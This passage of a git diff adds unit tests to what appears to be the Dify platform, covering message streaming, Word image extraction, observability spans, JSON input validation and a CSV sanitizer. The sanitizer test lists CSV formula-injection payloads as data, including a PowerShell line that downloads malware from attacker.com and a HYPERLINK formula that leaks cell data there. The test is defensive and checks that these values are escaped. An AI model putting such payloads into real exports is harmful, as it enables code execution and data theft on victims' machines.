message_cycle_manager): + """Test that message_to_stream_response skips database query when event_type is provided.""" + with patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class: + # Execute with event_type provided + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", message_id="test-message-id", event_type=StreamEvent.MESSAGE + ) + + # Assert + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.event == StreamEvent.MESSAGE + # Should not query database when event_type is provided + mock_session_class.assert_not_called() + + def test_message_to_stream_response_with_from_variable_selector(self, message_cycle_manager): + """Test message_to_stream_response with from_variable_selector parameter.""" + result = message_cycle_manager.message_to_stream_response( + answer="Hello world", + message_id="test-message-id", + from_variable_selector=["var1", "var2"], + event_type=StreamEvent.MESSAGE, + ) + + assert isinstance(result, MessageStreamResponse) + assert result.answer == "Hello world" + assert result.id == "test-message-id" + assert result.from_variable_selector == ["var1", "var2"] + assert result.event == StreamEvent.MESSAGE + + def test_optimization_usage_example(self, message_cycle_manager): + """Test the optimization pattern that should be used by callers.""" + # Step 1: Get event type once (this queries database) + with ( + patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class, + patch("core.app.task_pipeline.message_cycle_manager.db", new=SimpleNamespace(engine=Mock())), + ): + mock_session = Mock() + mock_session_class.return_value.__enter__.return_value = mock_session + # Current implementation uses session.query(...).scalar() + mock_session.query.return_value.scalar.return_value = None # No files + with current_app.app_context(): + event_type = message_cycle_manager.get_message_event_type("test-message-id") + + # Should query database once + mock_session_class.assert_called_once_with(ANY, expire_on_commit=False) + assert event_type == StreamEvent.MESSAGE + + # Step 2: Use event_type for multiple calls (no additional queries) + with patch("core.app.task_pipeline.message_cycle_manager.Session") as mock_session_class: + mock_session_class.return_value.__enter__.return_value = Mock() + + chunk1_response = message_cycle_manager.message_to_stream_response( + answer="Chunk 1", message_id="test-message-id", event_type=event_type + ) + + chunk2_response = message_cycle_manager.message_to_stream_response( + answer="Chunk 2", message_id="test-message-id", event_type=event_type + ) + + # Should not query database again + mock_session_class.assert_not_called() + + assert chunk1_response.event == StreamEvent.MESSAGE + assert chunk2_response.event == StreamEvent.MESSAGE + assert chunk1_response.answer == "Chunk 1" + assert chunk2_response.answer == "Chunk 2" diff --git a/api/tests/unit_tests/core/helper/test_csv_sanitizer.py b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py new file mode 100644 index 0000000000..443c2824d5 --- /dev/null +++ b/api/tests/unit_tests/core/helper/test_csv_sanitizer.py @@ -0,0 +1,151 @@ +"""Unit tests for CSV sanitizer.""" + +from core.helper.csv_sanitizer import CSVSanitizer + + +class TestCSVSanitizer: + """Test cases for CSV sanitization to prevent formula injection attacks.""" + + def test_sanitize_formula_equals(self): + """Test sanitizing values starting with = (most common formula injection).""" + assert CSVSanitizer.sanitize_value("=cmd|'/c calc'!A0") == "'=cmd|'/c calc'!A0" + assert CSVSanitizer.sanitize_value("=SUM(A1:A10)") == "'=SUM(A1:A10)" + assert CSVSanitizer.sanitize_value("=1+1") == "'=1+1" + assert CSVSanitizer.sanitize_value("=@SUM(1+1)") == "'=@SUM(1+1)" + + def test_sanitize_formula_plus(self): + """Test sanitizing values starting with + (plus formula injection).""" + assert CSVSanitizer.sanitize_value("+1+1+cmd|'/c calc") == "'+1+1+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("+123") == "'+123" + assert CSVSanitizer.sanitize_value("+cmd|'/c calc'!A0") == "'+cmd|'/c calc'!A0" + + def test_sanitize_formula_minus(self): + """Test sanitizing values starting with - (minus formula injection).""" + assert CSVSanitizer.sanitize_value("-2+3+cmd|'/c calc") == "'-2+3+cmd|'/c calc" + assert CSVSanitizer.sanitize_value("-456") == "'-456" + assert CSVSanitizer.sanitize_value("-cmd|'/c notepad") == "'-cmd|'/c notepad" + + def test_sanitize_formula_at(self): + """Test sanitizing values starting with @ (at-sign formula injection).""" + assert CSVSanitizer.sanitize_value("@SUM(1+1)*cmd|'/c calc") == "'@SUM(1+1)*cmd|'/c calc" + assert CSVSanitizer.sanitize_value("@AVERAGE(1,2,3)") == "'@AVERAGE(1,2,3)" + + def test_sanitize_formula_tab(self): + """Test sanitizing values starting with tab character.""" + assert CSVSanitizer.sanitize_value("\t=1+1") == "'\t=1+1" + assert CSVSanitizer.sanitize_value("\tcalc") == "'\tcalc" + + def test_sanitize_formula_carriage_return(self): + """Test sanitizing values starting with carriage return.""" + assert CSVSanitizer.sanitize_value("\r=1+1") == "'\r=1+1" + assert CSVSanitizer.sanitize_value("\rcmd") == "'\rcmd" + + def test_sanitize_safe_values(self): + """Test that safe values are not modified.""" + assert CSVSanitizer.sanitize_value("Hello World") == "Hello World" + assert CSVSanitizer.sanitize_value("123") == "123" + assert CSVSanitizer.sanitize_value("test@example.com") == "test@example.com" + assert CSVSanitizer.sanitize_value("Normal text") == "Normal text" + assert CSVSanitizer.sanitize_value("Question: How are you?") == "Question: How are you?" + + def test_sanitize_safe_values_with_special_chars_in_middle(self): + """Test that special characters in the middle are not escaped.""" + assert CSVSanitizer.sanitize_value("A = B + C") == "A = B + C" + assert CSVSanitizer.sanitize_value("Price: $10 + $20") == "Price: $10 + $20" + assert CSVSanitizer.sanitize_value("Email: user@domain.com") == "Email: user@domain.com" + + def test_sanitize_empty_values(self): + """Test handling of empty values.""" + assert CSVSanitizer.sanitize_value("") == "" + assert CSVSanitizer.sanitize_value(None) == "" + + def test_sanitize_numeric_types(self): + """Test handling of numeric types.""" + assert CSVSanitizer.sanitize_value(123) == "123" + assert CSVSanitizer.sanitize_value(456.789) == "456.789" + assert CSVSanitizer.sanitize_value(0) == "0" + # Negative numbers should be escaped (start with -) + assert CSVSanitizer.sanitize_value(-123) == "'-123" + + def test_sanitize_boolean_types(self): + """Test handling of boolean types.""" + assert CSVSanitizer.sanitize_value(True) == "True" + assert CSVSanitizer.sanitize_value(False) == "False" + + def test_sanitize_dict_with_specific_fields(self): + """Test sanitizing specific fields in a dictionary.""" + data = { + "question": "=1+1", + "answer": "+cmd|'/c calc", + "safe_field": "Normal text", + "id": "12345", + } + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "answer"]) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+cmd|'/c calc" + assert sanitized["safe_field"] == "Normal text" + assert sanitized["id"] == "12345" + + def test_sanitize_dict_all_string_fields(self): + """Test sanitizing all string fields when no field list provided.""" + data = { + "question": "=1+1", + "answer": "+calc", + "id": 123, # Not a string, should be ignored + } + sanitized = CSVSanitizer.sanitize_dict(data, None) + + assert sanitized["question"] == "'=1+1" + assert sanitized["answer"] == "'+calc" + assert sanitized["id"] == 123 # Unchanged + + def test_sanitize_dict_with_missing_fields(self): + """Test that missing fields in dict don't cause errors.""" + data = {"question": "=1+1"} + sanitized = CSVSanitizer.sanitize_dict(data, ["question", "nonexistent_field"]) + + assert sanitized["question"] == "'=1+1" + assert "nonexistent_field" not in sanitized + + def test_sanitize_dict_creates_copy(self): + """Test that sanitize_dict creates a copy and doesn't modify original.""" + original = {"question": "=1+1", "answer": "Normal"} + sanitized = CSVSanitizer.sanitize_dict(original, ["question"]) + + assert original["question"] == "=1+1" # Original unchanged + assert sanitized["question"] == "'=1+1" # Copy sanitized + + def test_real_world_csv_injection_payloads(self): + """Test against real-world CSV injection attack payloads.""" + # Common DDE (Dynamic Data Exchange) attack payloads + payloads = [ + "=cmd|'/c calc'!A0", + "=cmd|'/c notepad'!A0", + "+cmd|'/c powershell IEX(wget attacker.com/malware.ps1)'", + "-2+3+cmd|'/c calc'", + "@SUM(1+1)*cmd|'/c calc'", + "=1+1+cmd|'/c calc'", + '=HYPERLINK("http://attacker.com?leak="&A1&A2,"Click here")', + ] + + for payload in payloads: + result = CSVSanitizer.sanitize_value(payload) + # All should be prefixed with single quote + assert result.startswith("'"), f"Payload not sanitized: {payload}" + assert result == f"'{payload}", f"Unexpected sanitization for: {payload}" + + def test_multiline_strings(self): + """Test handling of multiline strings.""" + multiline = "Line 1\nLine 2\nLine 3" + assert CSVSanitizer.sanitize_value(multiline) == multiline + + multiline_with_formula = "=SUM(A1)\nLine 2" + assert CSVSanitizer.sanitize_value(multiline_with_formula) == f"'{multiline_with_formula}" + + def test_whitespace_only_strings(self): + """Test handling of whitespace-only strings.""" + assert CSVSanitizer.sanitize_value(" ") == " " + assert CSVSanitizer.sanitize_value("\n\n") == "\n\n" + # Tab at start should be escaped + assert CSVSanitizer.sanitize_value("\t ") == "'\t " diff --git a/api/tests/unit_tests/core/rag/extractor/test_helpers.py b/api/tests/unit_tests/core/rag/extractor/test_helpers.py new file mode 100644 index 0000000000..edf8735e57 --- /dev/null +++ b/api/tests/unit_tests/core/rag/extractor/test_helpers.py @@ -0,0 +1,10 @@ +import tempfile + +from core.rag.extractor.helpers import FileEncoding, detect_file_encodings + + +def test_detect_file_encodings() -> None: + with tempfile.NamedTemporaryFile(mode="w+t", suffix=".txt") as temp: + temp.write("Shared data") + temp_path = temp.name + assert detect_file_encodings(temp_path) == [FileEncoding(encoding="utf_8", confidence=0.0, language="Unknown")] diff --git a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py index 3635e4dbf9..fd0b0e2e44 100644 --- a/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py +++ b/api/tests/unit_tests/core/rag/extractor/test_word_extractor.py @@ -1,7 +1,10 @@ """Primarily used for testing merged cell scenarios""" +from types import SimpleNamespace + from docx import Document +import core.rag.extractor.word_extractor as we from core.rag.extractor.word_extractor import WordExtractor @@ -47,3 +50,85 @@ def test_parse_row(): extractor = object.__new__(WordExtractor) for idx, row in enumerate(table.rows): assert extractor._parse_row(row, {}, 3) == gt[idx] + + +def test_extract_images_from_docx(monkeypatch): + external_bytes = b"ext-bytes" + internal_bytes = b"int-bytes" + + # Patch storage.save to capture writes + saves: list[tuple[str, bytes]] = [] + + def save(key: str, data: bytes): + saves.append((key, data)) + + monkeypatch.setattr(we, "storage", SimpleNamespace(save=save)) + + # Patch db.session to record adds/commit + class DummySession: + def __init__(self): + self.added = [] + self.committed = False + + def add(self, obj): + self.added.append(obj) + + def commit(self): + self.committed = True + + db_stub = SimpleNamespace(session=DummySession()) + monkeypatch.setattr(we, "db", db_stub) + + # Patch config values used for URL composition and storage type + monkeypatch.setattr(we.dify_config, "FILES_URL", "http://files.local", raising=False) + monkeypatch.setattr(we.dify_config, "STORAGE_TYPE", "local", raising=False) + + # Patch UploadFile to avoid real DB models + class FakeUploadFile: + _i = 0 + + def __init__(self, **kwargs): # kwargs match the real signature fields + type(self)._i += 1 + self.id = f"u{self._i}" + + monkeypatch.setattr(we, "UploadFile", FakeUploadFile) + + # Patch external image fetcher + def fake_get(url: str): + assert url == "https://example.com/image.png" + return SimpleNamespace(status_code=200, headers={"Content-Type": "image/png"}, content=external_bytes) + + monkeypatch.setattr(we, "ssrf_proxy", SimpleNamespace(get=fake_get)) + + # A hashable internal part object with a blob attribute + class HashablePart: + def __init__(self, blob: bytes): + self.blob = blob + + def __hash__(self) -> int: # ensure it can be used as a dict key like real docx parts + return id(self) + + # Build a minimal doc object with both external and internal image rels + internal_part = HashablePart(blob=internal_bytes) + rel_ext = SimpleNamespace(is_external=True, target_ref="https://example.com/image.png") + rel_int = SimpleNamespace(is_external=False, target_ref="word/media/image1.png", target_part=internal_part) + doc = SimpleNamespace(part=SimpleNamespace(rels={"rId1": rel_ext, "rId2": rel_int})) + + extractor = object.__new__(WordExtractor) + extractor.tenant_id = "t1" + extractor.user_id = "u1" + + image_map = extractor._extract_images_from_docx(doc) + + # Returned map should contain entries for external (keyed by rId) and internal (keyed by target_part) + assert set(image_map.keys()) == {"rId1", internal_part} + assert all(v.startswith("![image](") and v.endswith("/file-preview)") for v in image_map.values()) + + # Storage should receive both payloads + payloads = {data for _, data in saves} + assert external_bytes in payloads + assert internal_bytes in payloads + + # DB interactions should be recorded + assert len(db_stub.session.added) == 2 + assert db_stub.session.committed is True diff --git a/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py b/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py index 7d246ac3cc..943a9e5712 100644 --- a/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py +++ b/api/tests/unit_tests/core/rag/splitter/test_text_splitter.py @@ -901,6 +901,13 @@ class TestFixedRecursiveCharacterTextSplitter: # Verify no empty chunks assert all(len(chunk) > 0 for chunk in result) + def test_double_slash_n(self): + data = "chunk 1\n\nsubchunk 1.\nsubchunk 2.\n\n---\n\nchunk 2\n\nsubchunk 1\nsubchunk 2." + separator = "\\n\\n---\\n\\n" + splitter = FixedRecursiveCharacterTextSplitter(fixed_separator=separator) + chunks = splitter.split_text(data) + assert chunks == ["chunk 1\n\nsubchunk 1.\nsubchunk 2.", "chunk 2\n\nsubchunk 1\nsubchunk 2."] + # ============================================================================ # Test Metadata Preservation diff --git a/api/tests/unit_tests/core/tools/utils/test_message_transformer.py b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py new file mode 100644 index 0000000000..af3cdddd5f --- /dev/null +++ b/api/tests/unit_tests/core/tools/utils/test_message_transformer.py @@ -0,0 +1,86 @@ +import pytest + +import core.tools.utils.message_transformer as mt +from core.tools.entities.tool_entities import ToolInvokeMessage + + +class _FakeToolFile: + def __init__(self, mimetype: str): + self.id = "fake-tool-file-id" + self.mimetype = mimetype + + +class _FakeToolFileManager: + """Fake ToolFileManager to capture the mimetype passed in.""" + + last_call: dict | None = None + + def __init__(self, *args, **kwargs): + pass + + def create_file_by_raw( + self, + *, + user_id: str, + tenant_id: str, + conversation_id: str | None, + file_binary: bytes, + mimetype: str, + filename: str | None = None, + ): + type(self).last_call = { + "user_id": user_id, + "tenant_id": tenant_id, + "conversation_id": conversation_id, + "file_binary": file_binary, + "mimetype": mimetype, + "filename": filename, + } + return _FakeToolFile(mimetype) + + +@pytest.fixture(autouse=True) +def _patch_tool_file_manager(monkeypatch): + # Patch the manager used inside the transformer module + monkeypatch.setattr(mt, "ToolFileManager", _FakeToolFileManager) + # also ensure predictable URL generation (no need to patch; uses id and extension only) + yield + _FakeToolFileManager.last_call = None + + +def _gen(messages): + yield from messages + + +def test_transform_tool_invoke_messages_mimetype_key_present_but_none(): + # Arrange: a BLOB message whose meta contains a mime_type key set to None + blob = b"hello" + msg = ToolInvokeMessage( + type=ToolInvokeMessage.MessageType.BLOB, + message=ToolInvokeMessage.BlobMessage(blob=blob), + meta={"mime_type": None, "filename": "greeting"}, + ) + + # Act + out = list( + mt.ToolFileMessageTransformer.transform_tool_invoke_messages( + messages=_gen([msg]), + user_id="u1", + tenant_id="t1", + conversation_id="c1", + ) + ) + + # Assert: default to application/octet-stream when mime_type is present but None + assert _FakeToolFileManager.last_call is not None + assert _FakeToolFileManager.last_call["mimetype"] == "application/octet-stream" + + # Should yield a BINARY_LINK (not IMAGE_LINK) and the URL ends with .bin + assert len(out) == 1 + o = out[0] + assert o.type == ToolInvokeMessage.MessageType.BINARY_LINK + assert isinstance(o.message, ToolInvokeMessage.TextMessage) + assert o.message.text.endswith(".bin") + # meta is preserved (still contains mime_type: None) + assert "mime_type" in (o.meta or {}) + assert o.meta["mime_type"] is None diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py new file mode 100644 index 0000000000..b18a3369e9 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py @@ -0,0 +1,101 @@ +""" +Shared fixtures for ObservabilityLayer tests. +""" + +from unittest.mock import MagicMock, patch + +import pytest +from opentelemetry.sdk.trace import TracerProvider +from opentelemetry.sdk.trace.export import SimpleSpanProcessor +from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter +from opentelemetry.trace import set_tracer_provider + +from core.workflow.enums import NodeType + + +@pytest.fixture +def memory_span_exporter(): + """Provide an in-memory span exporter for testing.""" + return InMemorySpanExporter() + + +@pytest.fixture +def tracer_provider_with_memory_exporter(memory_span_exporter): + """Provide a TracerProvider configured with memory exporter.""" + import opentelemetry.trace as trace_api + + trace_api._TRACER_PROVIDER = None + trace_api._TRACER_PROVIDER_SET_ONCE._done = False + + provider = TracerProvider() + processor = SimpleSpanProcessor(memory_span_exporter) + provider.add_span_processor(processor) + set_tracer_provider(provider) + + yield provider + + provider.force_flush() + + +@pytest.fixture +def mock_start_node(): + """Create a mock Start Node.""" + node = MagicMock() + node.id = "test-start-node-id" + node.title = "Start Node" + node.execution_id = "test-start-execution-id" + node.node_type = NodeType.START + return node + + +@pytest.fixture +def mock_llm_node(): + """Create a mock LLM Node.""" + node = MagicMock() + node.id = "test-llm-node-id" + node.title = "LLM Node" + node.execution_id = "test-llm-execution-id" + node.node_type = NodeType.LLM + return node + + +@pytest.fixture +def mock_tool_node(): + """Create a mock Tool Node with tool-specific attributes.""" + from core.tools.entities.tool_entities import ToolProviderType + from core.workflow.nodes.tool.entities import ToolNodeData + + node = MagicMock() + node.id = "test-tool-node-id" + node.title = "Test Tool Node" + node.execution_id = "test-tool-execution-id" + node.node_type = NodeType.TOOL + + tool_data = ToolNodeData( + title="Test Tool Node", + desc=None, + provider_id="test-provider-id", + provider_type=ToolProviderType.BUILT_IN, + provider_name="test-provider", + tool_name="test-tool", + tool_label="Test Tool", + tool_configurations={}, + tool_parameters={}, + ) + node._node_data = tool_data + + return node + + +@pytest.fixture +def mock_is_instrument_flag_enabled_false(): + """Mock is_instrument_flag_enabled to return False.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False): + yield + + +@pytest.fixture +def mock_is_instrument_flag_enabled_true(): + """Mock is_instrument_flag_enabled to return True.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True): + yield diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py new file mode 100644 index 0000000000..458cf2cc67 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py @@ -0,0 +1,219 @@ +""" +Tests for ObservabilityLayer. + +Test coverage: +- Initialization and enable/disable logic +- Node span lifecycle (start, end, error handling) +- Parser integration (default and tool-specific) +- Graph lifecycle management +- Disabled mode behavior +""" + +from unittest.mock import patch + +import pytest +from opentelemetry.trace import StatusCode + +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.observability import ObservabilityLayer + + +class TestObservabilityLayerInitialization: + """Test ObservabilityLayer initialization logic.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer initializes correctly when OTel is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true") + def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer enables when instrument flag is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + +class TestObservabilityLayerNodeSpanLifecycle: + """Test node span creation and lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_span_created_and_ended( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that span is created on node start and ended on node end.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].name == mock_llm_node.title + assert spans[0].status.status_code == StatusCode.OK + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_error_recorded_in_span( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that node execution errors are recorded in span.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + error = ValueError("Test error") + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, error) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].status.status_code == StatusCode.ERROR + assert len(spans[0].events) > 0 + assert any("exception" in event.name.lower() for event in spans[0].events) + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_end_without_start_handled_gracefully( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that ending a node without start doesn't crash.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + +class TestObservabilityLayerParserIntegration: + """Test parser integration for different node types.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_default_parser_used_for_regular_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node + ): + """Test that default parser is used for non-tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_start_node.id + assert attrs["node.execution_id"] == mock_start_node.execution_id + assert attrs["node.type"] == mock_start_node.node_type.value + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_tool_parser_used_for_tool_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node + ): + """Test that tool parser is used for tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_tool_node) + layer.on_node_run_end(mock_tool_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_tool_node.id + assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id + assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value + assert attrs["tool.name"] == mock_tool_node._node_data.tool_name + + +class TestObservabilityLayerGraphLifecycle: + """Test graph lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node): + """Test that on_graph_start clears node contexts.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_start() + assert len(layer._node_contexts) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_no_unfinished_spans( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that on_graph_end handles normal completion.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + layer.on_graph_end(None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_unfinished_spans_logs_warning( + self, tracer_provider_with_memory_exporter, mock_llm_node, caplog + ): + """Test that on_graph_end logs warning for unfinished spans.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_end(None) + + assert len(layer._node_contexts) == 0 + assert "node spans were not properly ended" in caplog.text + + +class TestObservabilityLayerDisabledMode: + """Test behavior when layer is disabled.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node): + """Test that disabled layer doesn't create spans on node start.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_graph_start() + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node): + """Test that disabled layer doesn't process node end.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 diff --git a/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py b/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py index 83799c9508..539e72edb5 100644 --- a/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py +++ b/api/tests/unit_tests/core/workflow/nodes/test_start_node_json_object.py @@ -1,3 +1,4 @@ +import json import time import pytest @@ -46,14 +47,16 @@ def make_start_node(user_inputs, variables): def test_json_object_valid_schema(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age"], + } + ) variables = [ VariableEntity( @@ -65,7 +68,7 @@ def test_json_object_valid_schema(): ) ] - user_inputs = {"profile": {"age": 20, "name": "Tom"}} + user_inputs = {"profile": json.dumps({"age": 20, "name": "Tom"})} node = make_start_node(user_inputs, variables) result = node._run() @@ -74,12 +77,23 @@ def test_json_object_valid_schema(): def test_json_object_invalid_json_string(): + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( variable="profile", label="profile", type=VariableEntityType.JSON_OBJECT, required=True, + json_schema=schema, ) ] @@ -88,38 +102,21 @@ def test_json_object_invalid_json_string(): node = make_start_node(user_inputs, variables) - with pytest.raises(ValueError, match="profile must be a JSON object"): - node._run() - - -@pytest.mark.parametrize("value", ["[1, 2, 3]", "123"]) -def test_json_object_valid_json_but_not_object(value): - variables = [ - VariableEntity( - variable="profile", - label="profile", - type=VariableEntityType.JSON_OBJECT, - required=True, - ) - ] - - user_inputs = {"profile": value} - - node = make_start_node(user_inputs, variables) - - with pytest.raises(ValueError, match="profile must be a JSON object"): + with pytest.raises(ValueError, match='{"age": 20, "name": "Tom" must be a valid JSON object'): node._run() def test_json_object_does_not_match_schema(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age", "name"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( @@ -132,7 +129,7 @@ def test_json_object_does_not_match_schema(): ] # age is a string, which violates the schema (expects number) - user_inputs = {"profile": {"age": "twenty", "name": "Tom"}} + user_inputs = {"profile": json.dumps({"age": "twenty", "name": "Tom"})} node = make_start_node(user_inputs, variables) @@ -141,14 +138,16 @@ def test_json_object_does_not_match_schema(): def test_json_object_missing_required_schema_field(): - schema = { - "type": "object", - "properties": { - "age": {"type": "number"}, - "name": {"type": "string"}, - }, - "required": ["age", "name"], - } + schema = json.dumps( + { + "type": "object", + "properties": { + "age": {"type": "number"}, + "name": {"type": "string"}, + }, + "required": ["age", "name"], + } + ) variables = [ VariableEntity( @@ -161,7 +160,7 @@ def test_json_object_missing_required_schema_field(): ] # Missing required field "name" - user_inputs = {"profile": {"age": 20}} + user_inputs = {"profile": json.dumps({"age": 20})} node = make_start_node(user_inputs, variables) @@ -214,7 +213,7 @@ def test_json_object_optional_variable_not_provided(): variable="profile", label="profile", type=VariableEntityType.JSON_OBJECT, - required=False, + required=True, ) ] @@ -223,5 +222,5 @@ def test_json_object_optional_variable_not_provided(): node = make_start_node(user_inputs, variables) # Current implementation raises a validation error even when the variable is optional - with pytest.raises(ValueError, match="profile must be a JSON object"): + with pytest.raises(ValueError, match="profile is required in input form"): node._run() diff --git a/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py new file mode 100644 index 0000000000..ead2334473 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/nodes/webhook/test_webhook_file_conversion.py @@ -0,0 +1,452 @@ +""" +Unit tests for webhook file conversion fix. + +This test verifies that webhook trigger nodes properly convert file dictionaries +to FileVariable objects, fixing the "Invalid variable type: ObjectVariable" error +when passing files to downstream LLM nodes. +""" + +from unittest.mock import Mock, patch + +from core.app.entities.app_invoke_entities import InvokeFrom +from core.workflow.entities.graph_init_params import GraphInitParams +from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus +from 